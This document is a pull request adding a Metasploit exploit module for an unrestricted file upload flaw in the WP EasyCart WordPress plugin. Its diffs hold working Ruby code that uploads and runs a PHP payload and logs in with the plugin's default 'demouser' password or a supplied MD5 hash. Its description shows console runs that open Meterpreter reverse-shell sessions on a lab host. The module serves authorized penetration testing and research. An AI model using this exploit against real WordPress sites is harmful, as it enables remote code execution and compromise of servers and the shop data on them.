### PR TITLE
Add WP EasyCart file upload exploit module

### DIFF
--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -27,7 +27,15 @@ class Metasploit3 < Msf::Exploit::Remote
                               user-accessible path. Making a direct request to
                               the uploaded file will allow the attacker to
                               execute the script with the privileges of the web
-                              server.},
+                              server.
+
+                              In versions <= 3.0.8 authentication can be done by
+                              using the WordPress credentials of a user with any
+                              role. In later versions, a valid EasyCart admin
+                              password will be required that is in use by any
+                              admin user. A default installation of EasyCart will
+                              setup a user called "demouser" with a preset password
+                              of "demouser".},
       'License'         => MSF_LICENSE,
       'Author'          =>
         [
@@ -42,14 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate'  => 'Jan 08 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [['wp-easycart < 3.0.5', {}]],
+      'Targets'         => [['wp-easycart < 3.0.16', {}]],
       'DefaultTarget'   => 0
     ))
 
     register_options(
       [
-        OptString.new('USERNAME', [true, 'The username to authenticate with']),
-        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+        OptString.new('USERNAME', [false, 'The WordPress username to authenticate with (versions <= 3.0.8)']),
+        OptString.new('PASSWORD', [false, 'The WordPress password to authenticate with (versions <= 3.0.8)']),
+        OptString.new('EC_PASSWORD', [false, 'The EasyCart password to authenticate with (versions <= 3.0.15)', 'demouser']),
+        OptBool.new('EC_PASSWORD_IS_HASH', [false, 'Indicates whether or not EC_PASSWORD is an MD5 hash', false])
       ], self.class)
   end
 
@@ -61,22 +71,66 @@ class Metasploit3 < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
-  def check
-    check_plugin_version_from_readme('wp-easycart', '3.0.5')
+  def ec_password
+    datastore['EC_PASSWORD']
   end
 
-  def generate_mime_message(payload, date_hash, name)
+  def ec_password_is_hash
+    datastore['EC_PASSWORD_IS_HASH']
+  end
+
+  def use_wordpress_authentication
+    username.to_s != '' && password.to_s != ''
+  end
+
+  def use_ec_authentication
+    ec_password.to_s != ''
+  end
+
+  def req_id
+    if ec_password_is_hash
+      return ec_password
+    else
+      return Digest::MD5.hexdigest(ec_password)
+    end
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.16')
+  end
+
+  def generate_mime_message(payload, date_hash, name, include_req_id)
     data = Rex::MIME::Message.new
     data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
+    data.add_part(req_id, nil, nil, 'form-data; name="reqID"') if include_req_id
     data
   end
 
   def exploit
-    print_status("#{peer} - Authenticating using #{username}:#{password}...")
-    cookie = wordpress_login(username, password)
-    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
-    print_good("#{peer} - Authenticated with WordPress")
+    if !use_wordpress_authentication && !use_ec_authentication
+      fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
+    end
+
+    vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
+    vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
+
+    if use_wordpress_authentication && use_ec_authentication
+      print_status("#{peer} - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...")
+    end
+
+    if use_wordpress_authentication
+      print_status("#{peer} - Authenticating using #{username}:#{password}...")
+      cookie = wordpress_login(username, password)
+
+      if use_ec_authentication
+        print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil?
+      else
+        fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+      end
+
+      print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
+    end
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
@@ -84,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
     plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
     uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
     payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
-    data = generate_mime_message(payload, date_hash, "#{payload_name}.php")
+    data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
 
     print_status("#{peer} - Uploading payload to #{payload_url}")
     res = send_request_cgi(
@@ -97,15 +151,19 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
     vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
-    print_good("#{peer} - Uploaded the payload")
 
     print_status("#{peer} - Executing the payload...")
     register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
-    send_request_cgi(
+    res = send_request_cgi(
     {
       'uri'     => payload_url,
       'method'  => 'GET'
     }, 5)
-    print_good("#{peer} - Executed payload")
+
+    if !res.nil? && res.code == 404
+      print_error("#{peer} - Failed to upload the payload")
+    else
+      print_good("#{peer} - Executed payload")
+    end
   end
 end

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'digest/md5'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -64,9 +65,9 @@ class Metasploit3 < Msf::Exploit::Remote
     check_plugin_version_from_readme('wp-easycart', '3.0.5')
   end
 
-  def generate_mime_message(payload, name)
+  def generate_mime_message(payload, date_hash, name)
     data = Rex::MIME::Message.new
-    data.add_part('1', nil, nil, 'form-data; name="datemd5"')
+    data.add_part(date_hash, nil, nil, 'form-data; name="datemd5"')
     data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
     data
   end
@@ -79,10 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
+    date_hash = Digest::MD5.hexdigest(Time.now.to_s)
     plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
     uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
-    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_1.php")
-    data = generate_mime_message(payload, "#{payload_name}.php")
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
+    data = generate_mime_message(payload, date_hash, "#{payload_name}.php")
 
     print_status("#{peer} - Uploading payload to #{payload_url}")
     res = send_request_cgi(
@@ -98,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote
     print_good("#{peer} - Uploaded the payload")
 
     print_status("#{peer} - Executing the payload...")
-    register_files_for_cleanup("#{payload_name}_1.php")
+    register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
     send_request_cgi(
     {
       'uri'     => payload_url,

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def initialize(info = {})
     super(update_info(
       info,
-      'Name'            => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload',
+      'Name'            => 'WordPress WP EasyCart Unrestricted File Upload',
       'Description'     => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
                               WordPress contains a flaw that allows a remote
                               attacker to execute arbitrary PHP code. This
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate'  => 'Jan 08 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [['wp-easycart < 3.0.16', {}]],
+      'Targets'         => [['wp-easycart < 3.0.17', {}]],
       'DefaultTarget'   => 0
     ))
 
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('wp-easycart', '3.0.16')
+    check_plugin_version_from_readme('wp-easycart', '3.0.17')
   end
 
   def generate_mime_message(payload, date_hash, name, include_req_id)
@@ -126,13 +126,15 @@ class Metasploit3 < Msf::Exploit::Remote
       print_status("#{peer} - Authenticating using #{username}:#{password}...")
       cookie = wordpress_login(username, password)
 
-      if use_ec_authentication
-        print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...") if cookie.nil?
+      if !cookie
+        if use_ec_authentication
+          print_warning("#{peer} - Failed to authenticate with WordPress, attempting upload with EC password next...")
+        else
+          fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress')
+        end
       else
-        fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+        print_good("#{peer} - Authenticated with WordPress")
       end
-
-      print_good("#{peer} - Authenticated with WordPress") unless cookie.nil?
     end
 
     print_status("#{peer} - Preparing payload...")

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -4,7 +4,6 @@
 ##
 
 require 'msf/core'
-require 'digest/md5'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
@@ -91,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
     if ec_password_is_hash
       return ec_password
     else
-      return Digest::MD5.hexdigest(ec_password)
+      return Rex::Text.md5(ec_password)
     end
   end
 
@@ -107,11 +106,15 @@ class Metasploit3 < Msf::Exploit::Remote
     data
   end
 
-  def exploit
+  def setup
     if !use_wordpress_authentication && !use_ec_authentication
       fail_with(Failure::BadConfig, 'You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value')
     end
 
+    super
+  end
+
+  def exploit
     vprint_status("#{peer} - WordPress authentication attack is enabled") if use_wordpress_authentication
     vprint_status("#{peer} - EC authentication attack is enabled") if use_ec_authentication
 
@@ -134,10 +137,11 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Preparing payload...")
     payload_name = Rex::Text.rand_text_alpha(10)
-    date_hash = Digest::MD5.hexdigest(Time.now.to_s)
+    date_hash = Rex::Text.md5(Time.now.to_s)
+    uploaded_filename = "#{payload_name}_#{date_hash}.php"
     plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
     uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
-    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_#{date_hash}.php")
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', uploaded_filename)
     data = generate_mime_message(payload, date_hash, "#{payload_name}.php", use_ec_authentication)
 
     print_status("#{peer} - Uploading payload to #{payload_url}")
@@ -153,7 +157,7 @@ class Metasploit3 < Msf::Exploit::Remote
     vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
 
     print_status("#{peer} - Executing the payload...")
-    register_files_for_cleanup("#{payload_name}_#{date_hash}.php")
+    register_files_for_cleanup(uploaded_filename)
     res = send_request_cgi(
     {
       'uri'     => payload_url,

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -1,0 +1,109 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress WP EasyCart 3.0.4 Unrestricted File Upload',
+      'Description'     => %q{WordPress Shopping Cart (WP EasyCart) Plugin for
+                              WordPress contains a flaw that allows a remote
+                              attacker to execute arbitrary PHP code. This
+                              flaw exists because the
+                              /inc/amfphp/administration/banneruploaderscript.php
+                              script does not properly verify or sanitize
+                              user-uploaded files. By uploading a .php file,
+                              the remote system will place the file in a
+                              user-accessible path. Making a direct request to
+                              the uploaded file will allow the attacker to
+                              execute the script with the privileges of the web
+                              server.},
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Kacper Szurek',                  # Vulnerability disclosure
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'References'      =>
+        [
+          ['OSVDB', '116806'],
+          ['WPVDB', '7745']
+        ],
+      'DisclosureDate'  => 'Jan 08 2015',
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['wp-easycart < 3.0.5', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The password to authenticate with'])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-easycart', '3.0.5')
+  end
+
+  def generate_mime_message(payload, name)
+    data = Rex::MIME::Message.new
+    data.add_part('1', nil, nil, 'form-data; name="datemd5"')
+    data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"Filedata\"; filename=\"#{name}\"")
+    data
+  end
+
+  def exploit
+    print_status("#{peer} - Authenticating using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    payload_name = Rex::Text.rand_text_alpha(10)
+    plugin_url = normalize_uri(wordpress_url_plugins, 'wp-easycart')
+    uploader_url = normalize_uri(plugin_url, 'inc', 'amfphp', 'administration', 'banneruploaderscript.php')
+    payload_url = normalize_uri(plugin_url, 'products', 'banners', "#{payload_name}_1.php")
+    data = generate_mime_message(payload, "#{payload_name}.php")
+
+    print_status("#{peer} - Uploading payload to #{payload_url}")
+    res = send_request_cgi(
+      'method'  => 'POST',
+      'uri'     => uploader_url,
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => data.to_s,
+      'cookie'  => cookie
+    )
+
+    fail_with(Failure::Unreachable, 'No response from the target') if res.nil?
+    vprint_error("#{peer} - Server responded with status code #{res.code}") if res.code != 200
+    print_good("#{peer} - Uploaded the payload")
+
+    print_status("#{peer} - Executing the payload...")
+    register_files_for_cleanup("#{payload_name}_1.php")
+    send_request_cgi(
+    {
+      'uri'     => payload_url,
+      'method'  => 'GET'
+    }, 5)
+    print_good("#{peer} - Executed payload")
+  end
+end

--- a/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_easycart_unrestricted_file_upload.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate'  => 'Jan 08 2015',
       'Platform'        => 'php',
       'Arch'            => ARCH_PHP,
-      'Targets'         => [['wp-easycart < 3.0.17', {}]],
+      'Targets'         => [['wp-easycart < 3.0.19', {}]],
       'DefaultTarget'   => 0
     ))
 
@@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    check_plugin_version_from_readme('wp-easycart', '3.0.17')
+    check_plugin_version_from_readme('wp-easycart', '3.0.19')
   end
 
   def generate_mime_message(payload, date_hash, name, include_req_id)


### PR DESCRIPTION
This module provides the ability to upload and execute an arbitrary PHP file by utilising a lack of validation in WordPress websites using versions <= 3.0.15 of the WP EasyCart plugin.

In versions <= 3.0.8 this can be exploited by authenticating as any WordPress user, and in versions 3.0.9 - 3.0.15 can be exploited by passing a valid password hash being used by _any_ admin in the EasyCart user system.
## References
- http://osvdb.org/show/osvdb/116806
- https://wpvulndb.com/vulnerabilities/7745
## Verification
- [ ] Download and install [WordPress](https://wordpress.org/download/)
- [ ] Download v3.0.4 of the WP EasyCart plugin from the plugin archive at https://downloads.wordpress.org/plugin/wp-easycart.3.0.4.zip
- [ ] Extract the `wp-easycart` folder into the `/wp-content/plugins/` directory inside your WordPress installation folder
- [ ] Ensure the wp-easycart directory has write access (`chmod 777 wp-easycart -R`) or ensure the ownership of the folder matches the user Apache is running as
- [ ] Login to your WordPress website and navigate to the plugins section (`/wp-admin/plugins.php`) and click the "Activate" link for the WP EasyCart plugin to activate it 
- [ ] Load msfconsole and `use exploit/unix/webapp/wp_easycart_unrestricted_file_upload`
- [ ] Set RHOST to the target's address
- [ ] If running WordPress in a subdirectory, ensure to set TARGETURI appropriately (e.g. if running in a folder called wordpress, set TARGETURI to /wordpress/)
- [ ] Set USERNAME to a valid registered username
- [ ] Set PASSWORD to the matching password for USERNAME
- [ ] Set the payload
- [ ] Run `check` to check if the version seems vulnerable
- [ ] Run `exploit` to upload and execute the payload
## Example Output
### Using EasyCart default password

```
msf > use exploit/unix/webapp/wp_easycart_unrestricted_file_upload 
msf exploit(wp_easycart_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_easycart_unrestricted_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_easycart_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-easycart/products/banners/UtQTqyJjaI_4c91a5b39aaa30c2998ca6ae60cab581.php
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 1 opened (192.168.1.189:4444 -> 192.168.1.15:40762) at 2015-01-12 23:18:47 +0000
[+] Deleted UtQTqyJjaI_4c91a5b39aaa30c2998ca6ae60cab581.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls
No entries exist in /var/www/html/wordpress/wp-content/plugins/wp-easycart/products/banners
meterpreter > 
```
### Using WordPress authentication with EasyCart authentication as a fallback (successful WordPress authentication)

```
msf > use exploit/unix/webapp/wp_easycart_unrestricted_file_upload 
msf exploit(wp_easycart_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_easycart_unrestricted_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_easycart_unrestricted_file_upload) > set USERNAME root
USERNAME => root
msf exploit(wp_easycart_unrestricted_file_upload) > set PASSWORD toor
PASSWORD => toor
msf exploit(wp_easycart_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...
[*] 192.168.1.15:80 - Authenticating using root:toor...
[+] 192.168.1.15:80 - Authenticated with WordPress
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-easycart/products/banners/GtglmVFlqg_a0d18dda410be59dca949efc9ebaac47.php
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 2 opened (192.168.1.189:4444 -> 192.168.1.15:40763) at 2015-01-12 23:20:23 +0000
[+] Deleted GtglmVFlqg_a0d18dda410be59dca949efc9ebaac47.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls
No entries exist in /var/www/html/wordpress/wp-content/plugins/wp-easycart/products/banners
meterpreter > 
```
### Using WordPress authentication with EasyCart authentication as a fallback (unsuccessful WordPress authentication)

```
msf > use exploit/unix/webapp/wp_easycart_unrestricted_file_upload 
msf exploit(wp_easycart_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_easycart_unrestricted_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_easycart_unrestricted_file_upload) > set USERNAME root
USERNAME => root
msf exploit(wp_easycart_unrestricted_file_upload) > set PASSWORD wrong
PASSWORD => wrong
msf exploit(wp_easycart_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Both EasyCart and WordPress credentials were supplied, attempting WordPress first...
[*] 192.168.1.15:80 - Authenticating using root:wrong...
[!] 192.168.1.15:80 - Failed to authenticate with WordPress, attempting upload with EC password next...
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-easycart/products/banners/zwgDoWOBjy_a971aae838c0e599f82dcb4e7cefd45d.php
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 5 opened (192.168.1.189:4444 -> 192.168.1.15:40766) at 2015-01-12 23:40:16 +0000
[+] Deleted zwgDoWOBjy_a971aae838c0e599f82dcb4e7cefd45d.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls
No entries exist in /var/www/html/wordpress/wp-content/plugins/wp-easycart/products/banners
meterpreter > 
```
### Output when running without specifying any credentials

```
msf exploit(wp_easycart_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[-] Exploit failed [bad-config]: You must set either the USERNAME and PASSWORD options or specify an EC_PASSWORD value
```
### Using a pre-hashed password for EasyCart authentication instead of an unhashed one

```
msf > use exploit/unix/webapp/wp_easycart_unrestricted_file_upload 
msf exploit(wp_easycart_unrestricted_file_upload) > set RHOST 192.168.1.15
RHOST => 192.168.1.15
msf exploit(wp_easycart_unrestricted_file_upload) > set TARGETURI /wordpress/
TARGETURI => /wordpress/
msf exploit(wp_easycart_unrestricted_file_upload) > set EC_PASSWORD 91017d590a69dc49807671a51f10ab7f
EC_PASSWORD => 91017d590a69dc49807671a51f10ab7f
msf exploit(wp_easycart_unrestricted_file_upload) > set EC_PASSWORD_IS_HASH true
EC_PASSWORD_IS_HASH => true
msf exploit(wp_easycart_unrestricted_file_upload) > run

[*] Started reverse handler on 192.168.1.189:4444 
[*] 192.168.1.15:80 - Preparing payload...
[*] 192.168.1.15:80 - Uploading payload to /wordpress/wp-content/plugins/wp-easycart/products/banners/gquDUNLoee_a91e28145cf70c6e444583628ad63318.php
[*] 192.168.1.15:80 - Executing the payload...
[*] Sending stage (40551 bytes) to 192.168.1.15
[*] Meterpreter session 4 opened (192.168.1.189:4444 -> 192.168.1.15:40765) at 2015-01-12 23:26:33 +0000
[+] Deleted gquDUNLoee_a91e28145cf70c6e444583628ad63318.php
[+] 192.168.1.15:80 - Executed payload

meterpreter > ls
No entries exist in /var/www/html/wordpress/wp-content/plugins/wp-easycart/products/banners
meterpreter > 
```
